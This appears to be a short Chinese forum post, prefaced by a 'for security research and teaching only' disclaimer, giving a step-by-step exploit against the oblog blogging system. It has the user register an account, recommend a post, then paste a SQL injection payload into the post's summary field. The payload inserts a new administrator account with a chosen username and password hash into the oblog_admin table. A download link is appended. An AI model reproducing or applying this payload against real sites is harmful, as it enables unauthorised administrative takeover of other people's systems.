以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
1、注册一个用户,用户名script,密码123456
2、发布一篇日志,日志标题:测试一下
3、个人前台首页找到日志"测试一下",点"推荐"
4、个人后台管理,选择"常用"选项中的"推荐日志",然后点"测试一下"日志后面的修改,把摘要内容修改成:
s'/**/WHERE/** /logid=1;insert/**/into/**/oblog_admin/**/(username,password,roleid)values('script','49ba59abbe56e057',0);--
5、最后点"确认提交"按钮,
相关下载链接:
//download.csdn.net/download/jeeecy/2495347?utm_source=bbsseo